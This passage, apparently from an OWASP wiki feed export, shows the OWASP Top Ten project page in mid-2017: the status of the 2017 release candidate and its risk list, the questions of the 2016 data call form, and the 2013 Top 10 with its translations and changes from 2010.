[[File:CWE_Logo.jpeg|link=https://cwe.mitre.org/]] - The CWE project for providing a mapping mechanism to easily map test cases to issues found by vulnerability detection tools.&lt;br /&gt;
&lt;br /&gt;
We are looking for volunteers. Please contact [mailto:dave.wichers@owasp.org Dave Wichers] if you are interested in contributing new test cases, tool results run against the benchmark, or anything else.&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]]&lt;/div&gt;</summary>
		<author><name>ErezYalon</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231552</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=231552"/>
				<updated>2017-07-11T11:51:59Z</updated>
		
		<summary type="html">&lt;p&gt;ErezYalon: Added current status. Added links to OWASP Summit outcomes and to GitHub Issues page.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 2017 – The appeal for data and opinions is still open==&lt;br /&gt;
&lt;br /&gt;
During the [https://owaspsummit.org/website/ OWASP Summit 2017], several sessions took place discussing many different aspects of the OWASP Top 10, for example, governance and validation, the data collection process, data assessment and review of the new suggested A7 and A10.&lt;br /&gt;
Main [https://owaspsummit.org/Outcomes/Owasp-Top-10-2017/Owasp-Top-10-2017.html outcomes of the OWASP Summit] include:&lt;br /&gt;
* RC1 of the OWASP Top 10 2017 has been rejected&lt;br /&gt;
* A1, A2, A3, A4, A5, A6, A8, A9 have been left untouched by consensus view&lt;br /&gt;
* Requirement to choose two additional items&lt;br /&gt;
* Appeal for data and opinion is open until August 25, 2017 ([https://github.com/OWASP/Top10/issues submit here])&lt;br /&gt;
* The new OWASP Top 10 2017 is to be released late November 2017.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 - 2017 Release Candidate ==&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Ohloh ==&lt;br /&gt;
&lt;br /&gt;
*https://www.ohloh.net/p/OWASP-Top-10&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 2017 Release Candidate - PDF]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Email List ==&lt;br /&gt;
[https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [10 Apr 2017] OWAP Top 10 - 2017 Release Candidate Published&lt;br /&gt;
* [17 Dec 2016] OWASP Top 10 - 2017 Data Call Data Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
* [Feb 2013] OWASP Top 10 - 2013 - Release Candidate Published&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
